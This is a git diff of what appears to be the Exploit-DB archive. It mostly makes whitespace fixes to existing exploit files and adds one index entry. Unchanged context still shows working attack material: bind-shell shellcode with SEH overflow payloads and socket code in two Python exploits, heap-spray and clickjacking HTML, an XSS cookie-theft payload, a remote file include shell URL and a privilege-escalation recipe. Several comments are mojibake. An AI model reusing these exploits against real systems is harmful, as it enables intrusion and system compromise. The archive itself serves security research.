 # Github : github.com/rezasp
 # youtube : https://youtu.be/_nZ4y0ZTrwA
 #
diff --git a/exploits/windows/local/47684.md b/exploits/windows/local/47684.md
index f60854ba0..20533d6a0 100644
--- a/exploits/windows/local/47684.md
+++ b/exploits/windows/local/47684.md
@@ -1,4 +1,4 @@
-## EDB Note
+## EDB Note
 Download:
 - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-1.exe
 - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-2.zip
diff --git a/exploits/windows/local/47831.txt b/exploits/windows/local/47831.txt
index 07e150643..5acdc05f0 100644
--- a/exploits/windows/local/47831.txt
+++ b/exploits/windows/local/47831.txt
@@ -16,53 +16,51 @@ The NextVPN Application was installed with insecure file permissions. It was fou
 C:\Users\user\AppData\Local\NextVPN>icacls *.exe
 
 Helper64.exe NT AUTHORITY\SYSTEM:(F)
-             BUILTIN\Administrators:(F)
-             DESKTOP-5V14SL6\user:(F)
- 
+             BUILTIN\Administrators:(F)
+             DESKTOP-5V14SL6\user:(F)
+ 
 NextVPN.exe NT AUTHORITY\SYSTEM:(F)
-            BUILTIN\Administrators:(F)
-            DESKTOP-5V14SL6\user:(F)
- 
+            BUILTIN\Administrators:(F)
+            DESKTOP-5V14SL6\user:(F)
+ 
 Proxifier.exe NT AUTHORITY\SYSTEM:(F)
-              BUILTIN\Administrators:(F)
-              DESKTOP-5V14SL6\user:(F)
- 
+              BUILTIN\Administrators:(F)
+              DESKTOP-5V14SL6\user:(F)
+ 
 ProxyChecker.exe NT AUTHORITY\SYSTEM:(F)
-                 BUILTIN\Administrators:(F)
-                 DESKTOP-5V14SL6\user:(F)
- 
+                 BUILTIN\Administrators:(F)
+                 DESKTOP-5V14SL6\user:(F)
+ 
 Uninstall.exe NT AUTHORITY\SYSTEM:(F)
-              BUILTIN\Administrators:(F)
-              DESKTOP-5V14SL6\user:(F)
- 
+              BUILTIN\Administrators:(F)
+              DESKTOP-5V14SL6\user:(F)
+ 
 Successfully processed 5 files; Failed processing 0 files
 and other Directories :
 
 >cd openconnect
 openconnect.exe NT AUTHORITY\SYSTEM:(F)
-                BUILTIN\Administrators:(F)
-                DESKTOP-5V14SL6\user:(F)
+                BUILTIN\Administrators:(F)
+                DESKTOP-5V14SL6\user:(F)
 Successfully processed 1 files; Failed processing 0 files
- 
- 
+ 
+ 
 >cd st
- 
+ 
 st.exe NT AUTHORITY\SYSTEM:(F)
-       BUILTIN\Administrators:(F)
-       DESKTOP-5V14SL6\user:(F)
+       BUILTIN\Administrators:(F)
+       DESKTOP-5V14SL6\user:(F)
 Successfully processed 1 files; Failed processing 0 files
- 
+ 
 >cd update
 
 update.exe NT AUTHORITY\SYSTEM:(F)
-           BUILTIN\Administrators:(F)
-           DESKTOP-5V14SL6\user:(F)
+           BUILTIN\Administrators:(F)
+           DESKTOP-5V14SL6\user:(F)
 
 Successfully processed 1 files; Failed processing 0 files
 
 [ Exploit -Privilege Escalation  ]
 
 ReplaceNextVPN.exe,update.exe,st.exe,openconnect.exe,Helper64.exe and other ... with any executable
-malicious  file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)
-
- 
\ No newline at end of file
+malicious  file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)
\ No newline at end of file
diff --git a/exploits/windows/local/48982.pdf b/exploits/windows/local/48982.pdf
index 3a1052705..e9e7dac49 100644
--- a/exploits/windows/local/48982.pdf
+++ b/exploits/windows/local/48982.pdf
@@ -69,7 +69,7 @@ endobj
 /Filter/FlateDecode
 >>
 stream
-xœŠ»@@EûùŠ[RØk	­x•ÄüW"DDç덜âžÜœ›b°ý“{‡éTg†¼tS)dÛ‘±=dœþ+9Ÿ_ÄifÔÈŒ [ŽãB_5!d§ZhP>¯ ‰
+xœŠ»@@EûùŠ[RØk	­x•ÄüW"DDç덜âžÜœ›b°ý“{‡éTg†¼tS)dÛ‘±=dœþ+9Ÿ_ÄifÔÈŒ [ŽãB_5!d§ZhP>¯ ‰
 endstream
 endobj
 6 0 obj
diff --git a/exploits/windows/remote/14385.html b/exploits/windows/remote/14385.html
index 8978936c6..5e6a94628 100644
--- a/exploits/windows/remote/14385.html
+++ b/exploits/windows/remote/14385.html
@@ -6,7 +6,7 @@
 <font face="Arial" size="2"><code class="xml plain">
 (V11.7 build 45)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
 <b>Clickjacking</b></code></font></p>
-<p align="center"> </p>
+<p align="center"> </p>
 <div class="style1" id="open"
 style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;"
 onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
@@ -31,8 +31,8 @@ onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
 	<p align="center">
 	<font size="1" color="#FFFFFF">ClickJacking</font></div>
 
-<p align="center"> </p>
-<p align="center"> </p>
+<p align="center"> </p>
+<p align="center"> </p>
 <p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
 
 
diff --git a/exploits/windows/remote/14447.html b/exploits/windows/remote/14447.html
index d739dbf86..ea9e172ef 100644
--- a/exploits/windows/remote/14447.html
+++ b/exploits/windows/remote/14447.html
@@ -16,15 +16,15 @@ function clickjack_armor(evt)
 <center>
 <br>
 <center><h1><font face="Calibri">Firefox 3.6.7 / SeaMonkey 2.0.6 Clickjacking Vulnerability</font></h1>
- <p> </p>
+ <p> </p>
 <div style="border-top-style: solid; border-top-width: 1px; padding-top: 1px">
 	<b><br><br>
 
 	<a href="http://www.Securitylab.ir" onclick="clickjack_armor(event)"> Go 
 	to the http://www.Securitylab.ir : (http://www.mozilla.org)</a></b></div>
 <div style="border-bottom-style: solid; border-bottom-width: 1px; padding-bottom: 1px">
- <p> </div>
-<p> </p>
+ <p> </div>
+<p> </p>
 </center>
 <div style="border-top-style: solid; border-top-width: 1px; border-bottom-style: solid; border-bottom-width: 1px; padding-top: 1px; padding-bottom: 1px">
 	<b><font face="Calibri">Pouya Daneshmand, Securitylab.ir</font></b></div>
diff --git a/exploits/windows/remote/18138.txt b/exploits/windows/remote/18138.txt
index 75e0a8ea3..42410bbab 100644
--- a/exploits/windows/remote/18138.txt
+++ b/exploits/windows/remote/18138.txt
@@ -3,8 +3,8 @@
 # Author: Alexey Sintsov
 # Software Link: http://www.vmware.com/
 # Version:2.0.2
-# Tested on: Windows 2003 / vCenter Update Manager 4.1 U1
-# CVE : CVE-2011-4404
+# Tested on: Windows 2003 / vCenter Update Manager 4.1 U1
+# CVE : CVE-2011-4404
 
 DSECRG-11-042 VMware Update Manager - Directory Traversal
 
@@ -53,9 +53,9 @@ Fixed in Update Manager 4.0 Windows Update 4
 
 About DSecRG
 *******
-The main mission of DSecRG is to conduct researches of business critical systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The result of this work is then integrates in ERPScan Security Scanner. Being on the top edge of ERP and SAP security DSecRG research helps to improve a quality of ERPScan consulting services and protects you from the latest threads. 
+The main mission of DSecRG is to conduct researches of business critical systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The result of this work is then integrates in ERPScan Security Scanner. Being on the top edge of ERP and SAP security DSecRG research helps to improve a quality of ERPScan consulting services and protects you from the latest threads. 
 Contact: research [at] dsecrg [dot] com
-http://www.dsecrg.com 
+http://www.dsecrg.com 
 
 About ERPScan
 *******
diff --git a/exploits/windows/remote/24017.html b/exploits/windows/remote/24017.html
index b4d58d1d8..c67bcea8c 100644
--- a/exploits/windows/remote/24017.html
+++ b/exploits/windows/remote/24017.html
@@ -23,7 +23,7 @@
 <html>
 <body>
 <div id="evil"></div>
-<table style="table-layout:fixed" ><col id="132" width="41" span="9" >  </col></table>
+<table style="table-layout:fixed" ><col id="132" width="41" span="9" >  </col></table>
 <script language='javascript'>
 
 function strtoint(str) {
diff --git a/exploits/windows/remote/33944.html b/exploits/windows/remote/33944.html
index 4632dd735..78a01be3e 100644
--- a/exploits/windows/remote/33944.html
+++ b/exploits/windows/remote/33944.html
@@ -11,7 +11,7 @@
 <html>
 <body>
 <div id="evil"></div>
-<table style="table-layout:fixed" ><col id="132" width="41" span="9" >  </col></table>
+<table style="table-layout:fixed" ><col id="132" width="41" span="9" >  </col></table>
 <script language='javascript'>
 
 function strtoint(str) {
diff --git a/exploits/windows/remote/34815.html b/exploits/windows/remote/34815.html
index cb36d49dd..8c0df13e9 100644
--- a/exploits/windows/remote/34815.html
+++ b/exploits/windows/remote/34815.html
@@ -11,7 +11,7 @@
 <html>
 <body>
 <div id="evil"></div>
-<table style="table-layout:fixed" ><col id="132" width="41" span="9" >  </col></table>
+<table style="table-layout:fixed" ><col id="132" width="41" span="9" >  </col></table>
 <script language='javascript'>
 
 function strtoint(str) {
diff --git a/exploits/windows/remote/35273.html b/exploits/windows/remote/35273.html
index b245512b8..a77dfb5d0 100644
--- a/exploits/windows/remote/35273.html
+++ b/exploits/windows/remote/35273.html
@@ -11,7 +11,7 @@
 <html>
 <body>
 <div id="evil"></div>
-<table style="table-layout:fixed" ><col id="132" width="41" span="9" >  </col></table>
+<table style="table-layout:fixed" ><col id="132" width="41" span="9" >  </col></table>
 <script language='javascript'>
 
 function strtoint(str) {
diff --git a/exploits/windows/remote/4301.cpp b/exploits/windows/remote/4301.cpp
index 4558546dc..146278e7d 100644
--- a/exploits/windows/remote/4301.cpp
+++ b/exploits/windows/remote/4301.cpp
@@ -92,7 +92,7 @@ __inline char GetB64Char(int index)
 #define B3(a) (a >> 24 & 0xFF)
 
 
-// ±àÂëºóµÄ³¤¶ÈÒ»°ã±ÈÔ­ÎĶàÕ¼1/3µÄ´æ´¢¿Õ¼ä£¬Çë±£Ö¤base64codeÓÐ×ã¹»µÄ¿Õ¼ä
+// ±à ÂëºóµÄ³¤¶ÈÒ»°ã±ÈÔ­ÎĶà Õ¼1/3µÄ´æ´¢¿Õ¼ä£¬Çë±£Ö¤base64codeÓÐ×ã¹»µÄ¿Õ¼ä
 inline int Base64Encode(char * base64code, const char * src, int src_len) 
 {   
     if (src_len == 0)
@@ -116,7 +116,7 @@ inline int Base64Encode(char * base64code, const char * src, int src_len)
 	psrc += 3;
     }
     
-    // ´¦Àí×îºóÓàϵIJ»×ã3×ֽڵĶöÊý¾Ý
+    // ´¦Àí×îºóÓà ϵIJ»×ã3×ֽڵĶöÊý¾Ý
     if (i < src_len)
     {
 	int rest = src_len - i;
diff --git a/exploits/windows/remote/43588.py b/exploits/windows/remote/43588.py
index 230aaafc3..abe4fef27 100755
--- a/exploits/windows/remote/43588.py
+++ b/exploits/windows/remote/43588.py
@@ -23,11 +23,11 @@ host = '192.168.72.231'
 
  
 stage1 = "\x83\xc4\x7f" *16 # metasm > add esp,127
-stage1 += "\x83\xc4\x04"    # metasm > add esp,4
-stage1 +=  "\xff\xe4"       # metasm > jmp esp
+stage1 += "\x83\xc4\x04"    # metasm > add esp,4
+stage1 +=  "\xff\xe4"       # metasm > jmp esp
 # msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b '\x02'
 
-buf =  ""
+buf =  ""
 buf += "\xb8\x01\x69\xed\x6f\xdd\xc3\xd9\x74\x24\xf4\x5a\x31"
 buf += "\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\x43\x67\x0f"
 buf += "\x9a\xbf\x9f\x4d\x65\x3f\x60\x32\xef\xda\x51\x72\x8b"
@@ -59,11 +59,11 @@ buf += "\x7d\x58\x6e\x5a"
 
 shellcode = buf
 
-payload = 'A' * 124             #offset
-payload +=  '\xeb\x12\x90\x90'  #jmp over seh retrun value
-payload += '\x3b\x38\x01\x10' * 4   # 0x1001383b : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [libdsm.dll]
+payload = 'A' * 124             #offset
+payload +=  '\xeb\x12\x90\x90'  #jmp over seh retrun value
+payload += '\x3b\x38\x01\x10' * 4   # 0x1001383b : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [libdsm.dll]
 payload += stage1 
-payload +=  '\x90' * (1000 - len(payload) - len(shellcode))
+payload +=  '\x90' * (1000 - len(payload) - len(shellcode))
 payload += shellcode 
 
  
@@ -85,13 +85,13 @@ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
 try:
 
-    print "[*] Testing connection to tatget %s:%s" %(host,port)
-    s.connect((host, port))
+    print "[*] Testing connection to tatget %s:%s" %(host,port)
+    s.connect((host, port))
 
 except:
 
-    print "[-] Unable to communicate to target %s:%s" %(host,port)
-    exit()
+    print "[-] Unable to communicate to target %s:%s" %(host,port)
+    exit()
 
  
 
diff --git a/exploits/windows/remote/43589.py b/exploits/windows/remote/43589.py
index ea3183914..befd8e258 100755
--- a/exploits/windows/remote/43589.py
+++ b/exploits/windows/remote/43589.py
@@ -23,11 +23,11 @@ host = '192.168.72.231'
 
 
 stage1 = "\x83\xc4\x7f" *17 # metasm > add esp,127
-stage1 += "\x83\xc4\x04"    # metasm > add esp,4
-stage1 +=  "\xff\xe4"       # metasm > jmp esp
+stage1 += "\x83\xc4\x04"    # metasm > add esp,4
+stage1 +=  "\xff\xe4"       # metasm > jmp esp
 # msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b '\x02'
 
-buf =  "\x90" * 10 
+buf =  "\x90" * 10 
 buf += "\xb8\x01\x69\xed\x6f\xdd\xc3\xd9\x74\x24\xf4\x5a\x31"
 buf += "\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\x43\x67\x0f"
 buf += "\x9a\xbf\x9f\x4d\x65\x3f\x60\x32\xef\xda\x51\x72\x8b"
@@ -58,11 +58,11 @@ buf += "\xfc\xe1\x93\x90\x1c\x80\x96\xdd\x9a\x79\xeb\x4e\x4f"
 buf += "\x7d\x58\x6e\x5a"
 
 shellcode = buf
-payload = 'A' * 124             #offset
-payload +=  '\xeb\x09\x90\x90'  #jmp over seh retrun value
-payload +=  '\xcd\x89\x06\x10' #0x100689cd : pop ebp # pop ebx # ret 0x04 |  {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\Disk Pulse Enterprise\bin\libspp.dll)
+payload = 'A' * 124             #offset
+payload +=  '\xeb\x09\x90\x90'  #jmp over seh retrun value
+payload +=  '\xcd\x89\x06\x10' #0x100689cd : pop ebp # pop ebx # ret 0x04 |  {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\Disk Pulse Enterprise\bin\libspp.dll)
 payload += stage1 
-payload +=  '\x90' * (1000 - len(payload) - len(shellcode))
+payload +=  '\x90' * (1000 - len(payload) - len(shellcode))
 payload += shellcode 
 
  
@@ -84,14 +84,14 @@ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
 try:
 
-    print "[*] Testing connection to tatget %s:%s" %(host,port)
-    s.connect((host, port))
+    print "[*] Testing connection to tatget %s:%s" %(host,port)
+    s.connect((host, port))
 
 except:
 
-    print "[-] Unable to communicate to target %s:%s" %(host,port)
+    print "[-] Unable to communicate to target %s:%s" %(host,port)
 
-    exit()
+    exit()
 
  
 
diff --git a/exploits/windows/remote/4438.cpp b/exploits/windows/remote/4438.cpp
index 69179ffd6..c07afa18c 100644
--- a/exploits/windows/remote/4438.cpp
+++ b/exploits/windows/remote/4438.cpp
@@ -44,7 +44,7 @@ jmp    loc_1001a6f0
 
   ËùÒÔ·¢ËÍžöÓÊŒþµœ·þÎñÆ÷£¬SMDÎÄŒþ
 
-  È»ºóÔÚÆäºóµÄÆ«ÒÆŽŠ¿ØÖÆÕâÁœžöµØÖ·£¬ŸÍ¿ÉÒÔ¿œ±ŽÈÎÒâ×Ö·ûŽ®µœÈÎÒâÄÚŽæ¡£
+  È»ºóÔÚÆäºóµÄÆ«ÒÆŽŠ¿ØÖÆÕâÁœžöµØÖ·£¬ŸÍ¿ÉÒÔ¿œ±ŽÈÎÒâ×Ö·ûŽ®µœÈÎÒâÄÚŽæ¡£
 
   badcharÊÇ 0x00 0x0a  emm˵»¹ÓОö 0x25,²»¹ýÎÒûÕÒµœ¡£
 
@@ -81,10 +81,10 @@ jmp    loc_1001a6f0
 
   ËùÒÔÕâžö©¶ŽÊǺÍƜ̚Î޹صģ¡£¡²»ÐèÒªÈκÎopcode£¡£¡
 
-  ÔÚʵŒÊÀûÓÃʱÎÒ·¢ËÍÁË4·âÓÊŒþ£¬µÚÒ»·âÊÇ·ÏÓÊŒþ£¬ÓÃÓÚÌážß³É¹ŠÂÊ¡£
+  ÔÚʵŒÊÀûÓÃʱÎÒ·¢ËÍÁË4·âÓÊŒþ£¬µÚÒ»·âÊÇ·ÏÓÊŒþ£¬ÓÃÓÚÌážß³É¹ŠÂÊ¡£
 
 
-  ÓÉÓÚ»¥ÁªÍøµÄspam·ºÀÄ£¬ËùÒԵȵœÓÊŒþ·þÎñÆ÷ŽŠÀí©¶ŽÓÊŒþʱ£¬Ò²ÐíÒÑŸ­¹ýÁËŒžžöÔÂÁË¡£¡£¡£
+  ÓÉÓÚ»¥ÁªÍøµÄspam·ºÀÄ£¬ËùÒԵȵœÓÊŒþ·þÎñÆ÷ŽŠÀí©¶ŽÓÊŒþʱ£¬Ò²ÐíÒÑŸ­¹ýÁËŒžžöÔÂÁË¡£¡£¡£
 
   ËùÒÔ×îºÃµÄ·œ°žÊÇʹÓÃdownload+exec µÄshellcode¡£
 
@@ -800,7 +800,7 @@ int sendfuckingmail(int the_mail, char *target, int tg_port)
 
 
 	// ÅжÏÊǵڌž·âÓÊŒþ
-	if (the_mail == 0)   // ·¢Ò»·â·ÏÓÊŒþ£¬Ìážß³É¹ŠÂÊ
+	if (the_mail == 0)   // ·¢Ò»·â·ÏÓÊŒþ£¬Ìážß³É¹ŠÂÊ
 	{
         /*
            my $padding = "\x22"."B"x2028;
diff --git a/exploits/windows/remote/46392.txt b/exploits/windows/remote/46392.txt
index e785eadbc..e8b89c54b 100644
--- a/exploits/windows/remote/46392.txt
+++ b/exploits/windows/remote/46392.txt
@@ -54,7 +54,7 @@ file server.
 
 [script]
 n0=on *:START: {
-n1=  /run calc.exe
+n1=  /run calc.exe
 n2=}
 
 poc.html
diff --git a/exploits/windows/webapps/21392.txt b/exploits/windows/webapps/21392.txt
index 9bcd2b98a..f644a3a33 100644
--- a/exploits/windows/webapps/21392.txt
+++ b/exploits/windows/webapps/21392.txt
@@ -283,27 +283,27 @@ enctype="application/x-www-form-urlencoded" method="POST" id="xss8" target="ZSL_
 
 <font color="#FF6633" style="margin-left:20">==================================<br /><input type="button"
 style="font-weight:bold;text-align:left;padding-top:4;padding-bottom:4;margin-left:10; width:330"
-value="  1. agreement[account]
-  2. vendor[name]
-  3. vendor[website]" onClick="xss1()" />
+value="  1. agreement[account]
+  2. vendor[name]
+  3. vendor[website]" onClick="xss1()" />
 <br />
 <font color="#FF6633" style="margin-left:20">==================================<br /><input type="button"
 style="font-weight:bold;text-align:left;padding-top:4;padding-bottom:4;margin-left:10; width:330"
-value="  4. article[new_references][][url]" onClick="xss2()" />
+value="  4. article[new_references][][url]" onClick="xss2()" />
 <br />
 <font color="#FF6633" style="margin-left:20">==================================<br /><input type="button"
 style="font-weight:bold;text-align:left;padding-top:4;padding-bottom:4;margin-left:10; width:330"
-value="  5. asset[device_type]
-  6. asset[mac_address]
-  7. asset[name]" onClick="xss3()" />
+value="  5. asset[device_type]
+  6. asset[mac_address]
+  7. asset[name]" onClick="xss3()" />
 <br />
 <font color="#FF6633" style="margin-left:20">==================================<br /><input type="button"
 style="font-weight:bold;text-align:left;padding-top:4;padding-bottom:4;margin-left:10; width:330"
-value="  8. category[name]" onClick="xss4()" />
+value="  8. category[name]" onClick="xss4()" />
 <br />
 <font color="#FF6633" style="margin-left:20">==================================<br /><input type="button"
 style="font-weight:bold;text-align:left;padding-top:4;padding-bottom:4;margin-left:10; width:330"
-value="  9. international[global_date_abbrev_format]
+value="  9. international[global_date_abbrev_format]
 10. international[global_date_format]
 11. international[global_date_time_format]
 12. international[global_date_simple_format]
diff --git a/exploits/windows_x86/webapps/14628.txt b/exploits/windows_x86/webapps/14628.txt
index 282d2c288..dc5ccb95d 100644
--- a/exploits/windows_x86/webapps/14628.txt
+++ b/exploits/windows_x86/webapps/14628.txt
@@ -1,6 +1,6 @@
-# Exploit Title: [PHP-Nuke-8.1-seo-Arabic Remote File Include ] 
-# Date: [12-8-2010] # Author: LoSt.HaCkEr 
-# Software Link: [http://scripts.bdr130.net/faile/PHP-Nuke-8.1-seo-Arabic.zip] # Version: [v 8.1] # Tested on: [Windows XP] 
+# Exploit Title: [PHP-Nuke-8.1-seo-Arabic Remote File Include ] 
+# Date: [12-8-2010] # Author: LoSt.HaCkEr 
+# Software Link: [http://scripts.bdr130.net/faile/PHP-Nuke-8.1-seo-Arabic.zip] # Version: [v 8.1] # Tested on: [Windows XP] 
 # CVE : [هكر المسيب]
 #Contact: LoSt.HaCkEr[at]yahoo[dot]com____________________________________
 
@@ -8,4 +8,4 @@ Exploit: http://target/PHP-Nuke-8.1-seo-Arabic/PHP-Nuke-8.1-seo-Arabic/html/main
 
 Exploit: http://target/PHP-Nuke-8.1-seo-Arabic/PHP-Nuke-8.1-seo-Arabic/html/index.php?ThemeSel=[shell]____________________________________________
 
-A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers
\ No newline at end of file
+A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers
\ No newline at end of file
diff --git a/exploits/xml/webapps/36941.txt b/exploits/xml/webapps/36941.txt
index aeda8c27f..2ffe2488f 100644
--- a/exploits/xml/webapps/36941.txt
+++ b/exploits/xml/webapps/36941.txt
@@ -27,14 +27,14 @@ View full advisory at https://www.securenetwork.it/docs/advisory/SN-14-04-IBM.pd
 [+] Proof of Concept (PoC)
 Authors are able to insert HTML tags through the HTML view of the Rich Text Editor when creating a new web content, although active scripts are blocked and not executed. However it is possible to inject arbitrary JavaScript using a licit tag such as "img". Rich Text Editor tries to correctly handle the tag allowing client-side script being executed. A trivial payload like the following can be used:
 
-	[!] Sample Payload
+	[!] Sample Payload
 	-------------------------
 	<img src=a onerror=alert(document.cookie)>
 	-------------------------
 
 An exemplifying HTTP request is reported below. 
 
-	[!] PoC HTTP Request
+	[!] PoC HTTP Request
 	-------------------------
 	POST portal/!ut/p/b1/pZHLboMwEEW_KLJJeC5HGHAQkJZQCt5EzqMmx[...] HTTP/1.1 Host:
 	Proxy-Connection: keep-alive
diff --git a/exploits/xml/webapps/42036.txt b/exploits/xml/webapps/42036.txt
index c758ae54f..6bc705602 100644
--- a/exploits/xml/webapps/42036.txt
+++ b/exploits/xml/webapps/42036.txt
@@ -149,9 +149,9 @@ Content-Length: 9689
 
 Solution:
 SAP has released patch on 13/12/2016
- 
+ 
 
 ## Credits
- * Ravindra Singh Rathore 
+ * Ravindra Singh Rathore 
  * https://in.linkedin.com/in/ravindra-singh-rathore-8aa89236
  * https://twitter.com/ravindra_hacks
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 9af7832d1..01e8367ba 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44343,3 +44343,4 @@ id,file,description,date,author,type,platform,port
 50213,exploits/php/webapps/50213.txt,"Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",2021-08-18,"Davide Taraschi",webapps,php,
 50214,exploits/php/webapps/50214.py,"Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-08-18,Tagoletta,webapps,php,
 50215,exploits/php/webapps/50215.txt,"COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections",2021-08-18,"Halit AKAYDIN",webapps,php,
+50217,exploits/php/webapps/50217.txt,"Charity Management System CMS 1.0 - Multiple Vulnerabilities",2021-08-19,"Davide Taraschi",webapps,php,
diff --git a/shellcodes/linux_x86/13332.c b/shellcodes/linux_x86/13332.c
index 936422ca0..a9502bb24 100644
--- a/shellcodes/linux_x86/13332.c
+++ b/shellcodes/linux_x86/13332.c
@@ -1,9 +1,9 @@
 /*
  ▐▄∙ ▄  ▄▄▄ .  ▐ ▄         ∙ ▌ ▄ ·.  ▄∙ ▄▌ ▄▄▄▄▄  ▄▄▄· 
-  █▌█▌■ ▀▄.▀· ∙█▌▐█ ■      ·██ ▐███■ █■██▌ ∙██   ▐█ ▀█ 
-  ·██·  ▐▀▀■▄ ▐█▐▐▌  ▄█▀▄  ▐█ ▌▐▌▐█· █▌▐█▌  ▐█.■ ▄█▀▀█ 
- ■▐█·█▌ ▐█▄▄▌ ██▐█▌ ▐█▌.▐▌ ██ ██▌▐█▌ ▐█▄█▌  ▐█▌· ▐█ ■▐▌
- ∙▀▀ ▀▀  ▀▀▀  ▀▀ █■  ▀█▄▀■ ▀▀  █■▀▀▀  ▀▀▀   ▀▀▀   ▀  ▀ 
+  █▌█▌■ ▀▄.▀· ∙█▌▐█ ■      ·██ ▐███■ █■██▌ ∙██   ▐█ ▀█ 
+  ·██·  ▐▀▀■▄ ▐█▐▐▌  ▄█▀▄  ▐█ ▌▐▌▐█· █▌▐█▌  ▐█.■ ▄█▀▀█ 
+ ■▐█·█▌ ▐█▄▄▌ ██▐█▌ ▐█▌.▐▌ ██ ██▌▐█▌ ▐█▄█▌  ▐█▌· ▐█ ■▐▌
+ ∙▀▀ ▀▀  ▀▀▀  ▀▀ █■  ▀█▄▀■ ▀▀  █■▀▀▀  ▀▀▀   ▀▀▀   ▀  ▀ 
 
 Ho' Detector (Promiscuous mode detector shellcode) 
 by XenoMuta <xenomuta[at]phreaker[dot]net>
diff --git a/shellcodes/windows_x86/39754.txt b/shellcodes/windows_x86/39754.txt
index 02d2c1d47..caef40e61 100644
--- a/shellcodes/windows_x86/39754.txt
+++ b/shellcodes/windows_x86/39754.txt
@@ -1,7 +1,7 @@
-# Exploit Title: .Net framework execute native x86 shellcode
+# Exploit Title: .Net framework execute native x86 shellcode
 # Date: May. 2nd 2016
-# Exploit Author: Jacky5112 
-# Software Link: https://github.com/jacky5112/ShellCodeTest_Version_1.0
+# Exploit Author: Jacky5112 
+# Software Link: https://github.com/jacky5112/ShellCodeTest_Version_1.0
 # Version: 1.0
 # Tested on: Windows
 # CVE : (none)